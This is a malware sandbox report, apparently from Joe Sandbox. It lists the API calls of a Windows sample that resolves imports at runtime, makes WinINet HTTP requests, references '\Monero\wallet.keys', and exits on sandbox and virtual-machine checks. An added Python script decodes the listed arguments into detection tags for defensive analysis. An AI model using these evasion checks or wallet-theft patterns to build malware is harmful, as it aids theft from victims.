                                        control_flow_graph 633 199f20-199f2a 634 199f30-19a341 GetProcAddress * 43 633->634 635 19a346-19a3da LoadLibraryA * 8 633->635 634->635 636 19a3dc-19a451 GetProcAddress * 5 635->636 637 19a456-19a45d 635->637 636->637 638 19a463-19a521 GetProcAddress * 8 637->638 639 19a526-19a52d 637->639 638->639 640 19a5a8-19a5af 639->640 641 19a52f-19a5a3 GetProcAddress * 5 639->641 642 19a5b5-19a642 GetProcAddress * 6 640->642 643 19a647-19a64e 640->643 641->640 642->643 644 19a72f-19a736 643->644 645 19a654-19a72a GetProcAddress * 9 643->645 646 19a738-19a7ad GetProcAddress * 5 644->646 647 19a7b2-19a7b9 644->647 645->644 646->647 648 19a7bb-19a7e7 GetProcAddress * 2 647->648 649 19a7ec-19a7f3 647->649 648->649 650 19a825-19a82c 649->650 651 19a7f5-19a820 GetProcAddress * 2 649->651 652 19a922-19a929 650->652 653 19a832-19a91d GetProcAddress * 10 650->653 651->650 654 19a92b-19a988 GetProcAddress * 4 652->654 655 19a98d-19a994 652->655 653->652 654->655 656 19a9ae-19a9b5 655->656 657 19a996-19a9a9 GetProcAddress 655->657 658 19aa18-19aa19 656->658 659 19a9b7-19aa13 GetProcAddress * 4 656->659 657->656 659->658
                                        APIs
                                        • GetProcAddress.KERNEL32(74DD0000,011B5850), ref: 00199F3D
                                        • GetProcAddress.KERNEL32(74DD0000,011B58D0), ref: 00199F55
                                        • GetProcAddress.KERNEL32(74DD0000,011C9670), ref: 00199F6E
                                        • GetProcAddress.KERNEL32(74DD0000,011C9628), ref: 00199F86
                                        • GetProcAddress.KERNEL32(74DD0000,011C96D0), ref: 00199F9E
                                        • GetProcAddress.KERNEL32(74DD0000,011C9658), ref: 00199FB7
                                        • GetProcAddress.KERNEL32(74DD0000,011BB6F8), ref: 00199FCF
                                        • GetProcAddress.KERNEL32(74DD0000,011CD110), ref: 00199FE7
                                        • GetProcAddress.KERNEL32(74DD0000,011CD128), ref: 0019A000
                                        • GetProcAddress.KERNEL32(74DD0000,011CD368), ref: 0019A018
                                        • GetProcAddress.KERNEL32(74DD0000,011CD398), ref: 0019A030
                                        • GetProcAddress.KERNEL32(74DD0000,011B5870), ref: 0019A049
                                        • GetProcAddress.KERNEL32(74DD0000,011B58F0), ref: 0019A061
                                        • GetProcAddress.KERNEL32(74DD0000,011B5A30), ref: 0019A079
                                        • GetProcAddress.KERNEL32(74DD0000,011B59F0), ref: 0019A092
                                        • GetProcAddress.KERNEL32(74DD0000,011CD3B0), ref: 0019A0AA
                                        • GetProcAddress.KERNEL32(74DD0000,011CD140), ref: 0019A0C2
                                        • GetProcAddress.KERNEL32(74DD0000,011BB8D8), ref: 0019A0DB
                                        • GetProcAddress.KERNEL32(74DD0000,011B5A50), ref: 0019A0F3
                                        • GetProcAddress.KERNEL32(74DD0000,011CD3C8), ref: 0019A10B
                                        • GetProcAddress.KERNEL32(74DD0000,011CD158), ref: 0019A124
                                        • GetProcAddress.KERNEL32(74DD0000,011CD2D8), ref: 0019A13C
                                        • GetProcAddress.KERNEL32(74DD0000,011CD1E8), ref: 0019A154
                                        • GetProcAddress.KERNEL32(74DD0000,011B5910), ref: 0019A16D
                                        • GetProcAddress.KERNEL32(74DD0000,011CD260), ref: 0019A185
                                        • GetProcAddress.KERNEL32(74DD0000,011CD230), ref: 0019A19D
                                        • GetProcAddress.KERNEL32(74DD0000,011CD338), ref: 0019A1B6
                                        • GetProcAddress.KERNEL32(74DD0000,011CD3E0), ref: 0019A1CE
                                        • GetProcAddress.KERNEL32(74DD0000,011CD380), ref: 0019A1E6
                                        • GetProcAddress.KERNEL32(74DD0000,011CD278), ref: 0019A1FF
                                        • GetProcAddress.KERNEL32(74DD0000,011CD248), ref: 0019A217
                                        • GetProcAddress.KERNEL32(74DD0000,011CD200), ref: 0019A22F
                                        • GetProcAddress.KERNEL32(74DD0000,011CD170), ref: 0019A248
                                        • GetProcAddress.KERNEL32(74DD0000,011CA720), ref: 0019A260
                                        • GetProcAddress.KERNEL32(74DD0000,011CD1A0), ref: 0019A278
                                        • GetProcAddress.KERNEL32(74DD0000,011CD188), ref: 0019A291
                                        • GetProcAddress.KERNEL32(74DD0000,011B5990), ref: 0019A2A9
                                        • GetProcAddress.KERNEL32(74DD0000,011CD2F0), ref: 0019A2C1
                                        • GetProcAddress.KERNEL32(74DD0000,011B59D0), ref: 0019A2DA
                                        • GetProcAddress.KERNEL32(74DD0000,011CD1B8), ref: 0019A2F2
                                        • GetProcAddress.KERNEL32(74DD0000,011CD1D0), ref: 0019A30A
                                        • GetProcAddress.KERNEL32(74DD0000,011B5A90), ref: 0019A323
                                        • GetProcAddress.KERNEL32(74DD0000,011B5E30), ref: 0019A33B
                                        • LoadLibraryA.KERNEL32(011CD0F8,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A34D
                                        • LoadLibraryA.KERNEL32(011CD218,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A35E
                                        • LoadLibraryA.KERNEL32(011CD290,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A370
                                        • LoadLibraryA.KERNEL32(011CD2A8,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A382
                                        • LoadLibraryA.KERNEL32(011CD2C0,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A393
                                        • LoadLibraryA.KERNEL32(011CD308,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A3A5
                                        • LoadLibraryA.KERNEL32(011CD320,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A3B7
                                        • LoadLibraryA.KERNEL32(011CD350,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A3C8
                                        • GetProcAddress.KERNEL32(75290000,011B5AB0), ref: 0019A3EA
                                        • GetProcAddress.KERNEL32(75290000,011CD4E8), ref: 0019A402
                                        • GetProcAddress.KERNEL32(75290000,011C9098), ref: 0019A41A
                                        • GetProcAddress.KERNEL32(75290000,011CD470), ref: 0019A433
                                        • GetProcAddress.KERNEL32(75290000,011B5B50), ref: 0019A44B
                                        • GetProcAddress.KERNEL32(73440000,011BB9A0), ref: 0019A470
                                        • GetProcAddress.KERNEL32(73440000,011B5AF0), ref: 0019A489
                                        • GetProcAddress.KERNEL32(73440000,011BB9C8), ref: 0019A4A1
                                        • GetProcAddress.KERNEL32(73440000,011CD548), ref: 0019A4B9
                                        • GetProcAddress.KERNEL32(73440000,011CD3F8), ref: 0019A4D2
                                        • GetProcAddress.KERNEL32(73440000,011B5D50), ref: 0019A4EA
                                        • GetProcAddress.KERNEL32(73440000,011B5D90), ref: 0019A502
                                        • GetProcAddress.KERNEL32(73440000,011CD578), ref: 0019A51B
                                        • GetProcAddress.KERNEL32(752C0000,011B5B30), ref: 0019A53C
                                        • GetProcAddress.KERNEL32(752C0000,011B5AD0), ref: 0019A554
                                        • GetProcAddress.KERNEL32(752C0000,011CD590), ref: 0019A56D
                                        • GetProcAddress.KERNEL32(752C0000,011CD428), ref: 0019A585
                                        • GetProcAddress.KERNEL32(752C0000,011B5B90), ref: 0019A59D
                                        • GetProcAddress.KERNEL32(74EC0000,011BB680), ref: 0019A5C3
                                        • GetProcAddress.KERNEL32(74EC0000,011BB720), ref: 0019A5DB
                                        • GetProcAddress.KERNEL32(74EC0000,011CD4D0), ref: 0019A5F3
                                        • GetProcAddress.KERNEL32(74EC0000,011B5CF0), ref: 0019A60C
                                        • GetProcAddress.KERNEL32(74EC0000,011B5E10), ref: 0019A624
                                        • GetProcAddress.KERNEL32(74EC0000,011BB748), ref: 0019A63C
                                        • GetProcAddress.KERNEL32(75BD0000,011CD488), ref: 0019A662
                                        • GetProcAddress.KERNEL32(75BD0000,011B5C90), ref: 0019A67A
                                        • GetProcAddress.KERNEL32(75BD0000,011C8FE8), ref: 0019A692
                                        • GetProcAddress.KERNEL32(75BD0000,011CD4A0), ref: 0019A6AB
                                        • GetProcAddress.KERNEL32(75BD0000,011CD530), ref: 0019A6C3
                                        • GetProcAddress.KERNEL32(75BD0000,011B5B10), ref: 0019A6DB
                                        • GetProcAddress.KERNEL32(75BD0000,011B5BD0), ref: 0019A6F4
                                        • GetProcAddress.KERNEL32(75BD0000,011CD410), ref: 0019A70C
                                        • GetProcAddress.KERNEL32(75BD0000,011CD500), ref: 0019A724
                                        • GetProcAddress.KERNEL32(75A70000,011B5CD0), ref: 0019A746
                                        • GetProcAddress.KERNEL32(75A70000,011CD440), ref: 0019A75E
                                        • GetProcAddress.KERNEL32(75A70000,011CD560), ref: 0019A776
                                        • GetProcAddress.KERNEL32(75A70000,011CD5A8), ref: 0019A78F
                                        • GetProcAddress.KERNEL32(75A70000,011CD458), ref: 0019A7A7
                                        • GetProcAddress.KERNEL32(75450000,011B5D10), ref: 0019A7C8
                                        • GetProcAddress.KERNEL32(75450000,011B5E50), ref: 0019A7E1
                                        • GetProcAddress.KERNEL32(75DA0000,011B5B70), ref: 0019A802
                                        • GetProcAddress.KERNEL32(75DA0000,011CD4B8), ref: 0019A81A
                                        • GetProcAddress.KERNEL32(6F070000,011B5C70), ref: 0019A840
                                        • GetProcAddress.KERNEL32(6F070000,011B5BF0), ref: 0019A858
                                        • GetProcAddress.KERNEL32(6F070000,011B5DB0), ref: 0019A870
                                        • GetProcAddress.KERNEL32(6F070000,011CD518), ref: 0019A889
                                        • GetProcAddress.KERNEL32(6F070000,011B5BB0), ref: 0019A8A1
                                        • GetProcAddress.KERNEL32(6F070000,011B5CB0), ref: 0019A8B9
                                        • GetProcAddress.KERNEL32(6F070000,011B5C10), ref: 0019A8D2
                                        • GetProcAddress.KERNEL32(6F070000,011B5C30), ref: 0019A8EA
                                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0019A901
                                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0019A917
                                        • GetProcAddress.KERNEL32(75AF0000,011CD080), ref: 0019A939
                                        • GetProcAddress.KERNEL32(75AF0000,011C9048), ref: 0019A951
                                        • GetProcAddress.KERNEL32(75AF0000,011CD008), ref: 0019A969
                                        • GetProcAddress.KERNEL32(75AF0000,011CD0C8), ref: 0019A982
                                        • GetProcAddress.KERNEL32(75D90000,011B5D30), ref: 0019A9A3
                                        • GetProcAddress.KERNEL32(6E330000,011CCF60), ref: 0019A9C4
                                        • GetProcAddress.KERNEL32(6E330000,011B5DD0), ref: 0019A9DD
                                        • GetProcAddress.KERNEL32(6E330000,011CD020), ref: 0019A9F5
                                        • GetProcAddress.KERNEL32(6E330000,011CCED0), ref: 0019AA0D
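The API listings for the three functions above (the WinINet GET routine at 1862d0, the volume-serial fingerprint routine at 197690 and the GetProcAddress resolver at 199f20) print every argument as a raw DWORD, so the reader has to know by heart that 0x00400100 is INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, that option 0x1F is INTERNET_OPTION_SECURITY_FLAGS and that query 0x13 is HTTP_QUERY_STATUS_CODE. The script below is an added example, not Joe Sandbox code and not code from the sample: it parses lines in the exact format this report uses, decodes the numeric arguments with the documented wininet.h constants, and rolls the result up into behaviour tags. The constant values are Windows SDK facts; the tag names, the parser and SAMPLE_APIS (constructed from lines copied off this page) are this example's own.

```python
"""Decode the numeric arguments of a Joe Sandbox 'APIs' listing into Windows SDK names.
Added example for this report page, not Joe Sandbox code and not the sample's code. The
constant tables are wininet.h values; SAMPLE_APIS is constructed from lines on this page."""
import re
from collections import Counter

SAMPLE_APIS = """\
• Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
• InternetOpenA.WININET(001A0DFF,00000001,00000000,00000000,00000000), ref: 00186331
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00186385
• HttpOpenRequestA.WININET(00000000,GET,?,011CE398,00000000,00000000,00400100,00000000), ref: 001863D5
• InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0018640F
• HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00186421
• HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0018644D
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001864BD
• GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0019770F
• wsprintfA.USER32 ref: 001977D0
• GetProcAddress.KERNEL32(74DD0000,011B5850), ref: 00199F3D
• GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0019A901
• GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0019A917
• LoadLibraryA.KERNEL32(011CD0F8,?,00195EF3,001A0AEB,?,?,?,?,?,?,?,?,?,?,001A0AEA,001A0AE7), ref: 0019A34D
"""

# Documented wininet.h constants for the arguments this report shows.
INTERNET_FLAG_BITS = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
                      0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
                      0x00080000: "INTERNET_FLAG_NO_COOKIES", 0x00040000: "INTERNET_FLAG_NO_AUTH",
                      0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPTION = {2: "INTERNET_OPTION_CONNECT_TIMEOUT", 5: "INTERNET_OPTION_SEND_TIMEOUT",
                   6: "INTERNET_OPTION_RECEIVE_TIMEOUT", 31: "INTERNET_OPTION_SECURITY_FLAGS"}
HTTP_QUERY = {1: "HTTP_QUERY_CONTENT_TYPE", 5: "HTTP_QUERY_CONTENT_LENGTH",
              19: "HTTP_QUERY_STATUS_CODE", 22: "HTTP_QUERY_RAW_HEADERS_CRLF"}

# '• [Part of subcall function X: ]Api.MODULE(args), ref: ADDR'; the wsprintfA line carries no '(args)'.
LINE_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<api>\w+)\.(?P<module>\w+)"
                     r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{8}$")  # Joe Sandbox prints known DWORD arguments as 8 hex digits

def parse_api_lines(text):
    """One dict per API line; lines that are not API entries (headings, strings) are skipped."""
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        raw = m.group("args")
        calls.append({"api": m.group("api"), "module": m.group("module"), "ref": int(m.group("ref"), 16),
                      "args": [a.strip() for a in raw.split(",")] if raw else []})
    return calls

def arg_int(a):
    return int(a, 16) if HEX_RE.match(a) else None  # '?' (unknown) and literals such as GET give None

def flag_names(value):
    """Split an HttpOpenRequestA dwFlags value into named bits, keeping any unknown remainder as hex."""
    names = [n for bit, n in INTERNET_FLAG_BITS.items() if value & bit]
    rest = value & ~sum(INTERNET_FLAG_BITS)
    return (names + ([hex(rest)] if rest else [])) or ["0"]

def decode_call(call):
    """Translate the arguments of the call types this report shows; unknown APIs give {}."""
    api, args = call["api"], call["args"]
    a = lambda i: arg_int(args[i]) if i < len(args) else None
    if api == "InternetOpenA":
        return {"access": INTERNET_OPEN_TYPE.get(a(1), "unknown")}
    if api == "InternetConnectA":
        return {"service": INTERNET_SERVICE.get(a(5), "unknown")}
    if api == "HttpOpenRequestA" and len(args) > 6:
        return {"verb": args[1], "flags": flag_names(a(6) or 0)}
    if api == "InternetSetOptionA":
        return {"option": INTERNET_OPTION.get(a(1), f"option {a(1)}"), "size": a(3)}
    if api == "HttpQueryInfoA":
        return {"query": HTTP_QUERY.get(a(1), f"level {a(1)}"), "buffer": a(3)}
    if api == "InternetReadFile":
        return {"chunk": a(2)}
    if api == "GetProcAddress" and len(args) > 1:  # name passed as a literal string or as a pointer
        kind = "unknown" if args[1] == "?" else ("pointer" if a(1) is not None else "literal")
        return {"module_base": args[0], "name": args[1], "name_kind": kind}
    return {}

def summarize(calls):
    """Decoded first occurrence of each API plus the behaviour tags a detection engineer would record."""
    decoded, apis = {}, Counter(c["api"] for c in calls)
    for c in calls:
        decoded.setdefault(c["api"], decode_call(c))
    gpa = [decode_call(c) for c in calls if c["api"] == "GetProcAddress"]
    tags = []
    if {"InternetConnectA", "HttpOpenRequestA", "HttpSendRequestA", "InternetReadFile"} <= set(apis):
        tags.append("wininet-http-download")
    if "GetVolumeInformationA" in apis:
        tags.append("volume-serial-fingerprint")
    if "LoadLibraryA" in apis and any(d.get("name_kind") == "pointer" for d in gpa):
        tags.append("runtime-import-resolution-with-non-literal-names")
    return {"decoded": decoded, "api_counts": dict(apis), "tags": tags,
            "getprocaddress_per_module": dict(Counter(d["module_base"] for d in gpa if d)),
            "literal_import_names": sorted(d["name"] for d in gpa if d.get("name_kind") == "literal")}

if __name__ == "__main__":
    for key, value in summarize(parse_api_lines(SAMPLE_APIS)).items():
        print(key, value)
```

Run against the listings on this page, the decoder shows the GET routine opening a direct (non-proxied) HTTP session, requesting with INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, writing a 4-byte INTERNET_OPTION_SECURITY_FLAGS value whose content the report does not record (the argument is printed as `?`), reading HTTP_QUERY_STATUS_CODE into a 256-byte buffer and pulling the body in 0x7CF (1999) byte chunks. For the resolver at 199f20 it counts how many names are resolved per module base and which names are literal strings: only InternetSetOptionA and HttpQueryInfoA appear in clear, the rest are pointers into the 011Bxxxx/011Cxxxx region. The module bases (74DD0000, 6F070000 and so on) are per-run load addresses, so any signature built from this output should key on the resolution counts and literal names, not on the base values.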
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$LibraryLoad
                                        • String ID: HttpQueryInfoA$InternetSetOptionA
                                        • API String ID: 2238633743-1775429166
                                        • Opcode ID: c655fac3673028f2bb5040aaee1446641f370befd55c62e0d88a2d7788b61a8c
                                        • Instruction ID: 3d33b09ff728ac4f55fac6de7997f8060ddb4ffd3728b5a792d5368dfe25fb29
                                        • Opcode Fuzzy Hash: c655fac3673028f2bb5040aaee1446641f370befd55c62e0d88a2d7788b61a8c
                                        • Instruction Fuzzy Hash: 2F623CB5619700AFC344DFA8FC889567BB9A74D703751867ABA09C3372DB34E940CB68

                                        Control-flow Graph
                                        APIs
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00184800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00184889
                                          • Part of subcall function 00184800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00184899
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00184965
                                        • StrCmpCA.SHLWAPI(?,011CE938), ref: 0018498A
                                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00184B0A
                                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001A0DDE,00000000,?,?,00000000,?,",00000000,?,011CE788), ref: 00184E38
                                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00184E54
                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00184E68
                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00184E99
                                        • InternetCloseHandle.WININET(00000000), ref: 00184EFD
                                        • InternetCloseHandle.WININET(00000000), ref: 00184F15
                                        • HttpOpenRequestA.WININET(00000000,011CE838,?,011CE398,00000000,00000000,00400100,00000000), ref: 00184B65
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                        • InternetCloseHandle.WININET(00000000), ref: 00184F1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                        • String ID: "$"$------$------$------
                                        • API String ID: 460715078-2180234286
                                        • Opcode ID: 4e72f504d1e0ad971d75354629d9d9bc7bf810dee38c9743b748bfd8bc7fbbf7
                                        • Instruction ID: e38e788719dba7a9becaf41396e65d7dc11b37c64b309c387e4098ea6c64c1f7
                                        • Opcode Fuzzy Hash: 4e72f504d1e0ad971d75354629d9d9bc7bf810dee38c9743b748bfd8bc7fbbf7
                                        • Instruction Fuzzy Hash: 6712BA72911118ABCF15EB90DDA2FEEB379BF25300F9045A9B10766091DF706B48CFA5

                                        Control-flow Graph
                                        APIs
                                          • Part of subcall function 0019AB30: lstrlen.KERNEL32(00184F55,?,?,00184F55,001A0DDF), ref: 0019AB3B
                                          • Part of subcall function 0019AB30: lstrcpy.KERNEL32(001A0DDF,00000000), ref: 0019AB95
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195894
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 001958F1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195AA7
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                          • Part of subcall function 00195440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195478
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                          • Part of subcall function 00195510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195568
                                          • Part of subcall function 00195510: lstrlen.KERNEL32(00000000), ref: 0019557F
                                          • Part of subcall function 00195510: StrStrA.SHLWAPI(00000000,00000000), ref: 001955B4
                                          • Part of subcall function 00195510: lstrlen.KERNEL32(00000000), ref: 001955D3
                                          • Part of subcall function 00195510: lstrlen.KERNEL32(00000000), ref: 001955FE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001959DB
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00195B90
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00195C5C
                                        • Sleep.KERNEL32(0000EA60), ref: 00195C6B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2791005934
                                        • Opcode ID: 56eeaf9dfe9fd96f92cc189405c03b37f58de78f76aa6e00b2e14e34b194c882
                                        • Instruction ID: bc01919af4e0005be7835c9da3137869857c739ef3327b7d0ceb86bf5d5d5187
                                        • Opcode Fuzzy Hash: 56eeaf9dfe9fd96f92cc189405c03b37f58de78f76aa6e00b2e14e34b194c882
                                        • Instruction Fuzzy Hash: 11E114729101049BCF14FBA0ED669ED737EAF65300F908568B50767092EF34AB0CCB96

                                        Control-flow Graph
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00191A15
                                        • ExitProcess.KERNEL32 ref: 00191A21
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 8d194ae1b599f66d00ce26abf123051aa2c17e261144a4a346c5e90a243f8405
                                        • Instruction ID: 6a7e4e03fa18f1ad688ba14f98fc56fd9f4a583140881133c01e745b86803553
                                        • Opcode Fuzzy Hash: 8d194ae1b599f66d00ce26abf123051aa2c17e261144a4a346c5e90a243f8405
                                        • Instruction Fuzzy Hash: 64512079B0420AEFDF14DFE4DA54AAE77BAEF44705F104098F402AB251E770E984CBA1

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2398), ref: 00199BF1
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2338), ref: 00199C0A
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2410), ref: 00199C22
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2500), ref: 00199C3A
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C22F0), ref: 00199C53
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C8FB8), ref: 00199C6B
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011B5810), ref: 00199C83
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011B5A70), ref: 00199C9C
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2428), ref: 00199CB4
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2440), ref: 00199CCC
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C24D0), ref: 00199CE5
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C23B0), ref: 00199CFD
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011B59B0), ref: 00199D15
                                          • Part of subcall function 00199BB0: GetProcAddress.KERNEL32(74DD0000,011C2470), ref: 00199D2E
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 001811D0: ExitProcess.KERNEL32 ref: 00181211
                                          • Part of subcall function 00181160: GetSystemInfo.KERNEL32(?), ref: 0018116A
                                          • Part of subcall function 00181160: ExitProcess.KERNEL32 ref: 0018117E
                                          • Part of subcall function 00181110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0018112B
                                          • Part of subcall function 00181110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00181132
                                          • Part of subcall function 00181110: ExitProcess.KERNEL32 ref: 00181143
                                          • Part of subcall function 00181220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0018123E
                                          • Part of subcall function 00181220: ExitProcess.KERNEL32 ref: 00181294
                                          • Part of subcall function 00196A10: GetUserDefaultLangID.KERNEL32 ref: 00196A14
                                          • Part of subcall function 00181190: ExitProcess.KERNEL32 ref: 001811C6
                                          • Part of subcall function 001979E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001811B7), ref: 00197A10
                                          • Part of subcall function 001979E0: RtlAllocateHeap.NTDLL(00000000), ref: 00197A17
                                          • Part of subcall function 001979E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00197A2F
                                          • Part of subcall function 00197A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197AA0
                                          • Part of subcall function 00197A70: RtlAllocateHeap.NTDLL(00000000), ref: 00197AA7
                                          • Part of subcall function 00197A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00197ABF
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,011C8F08,?,001A10F4,?,00000000,?,001A10F8,?,00000000,001A0AF3), ref: 00196D6A
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00196D88
                                        • CloseHandle.KERNEL32(00000000), ref: 00196D99
                                        • Sleep.KERNEL32(00001770), ref: 00196DA4
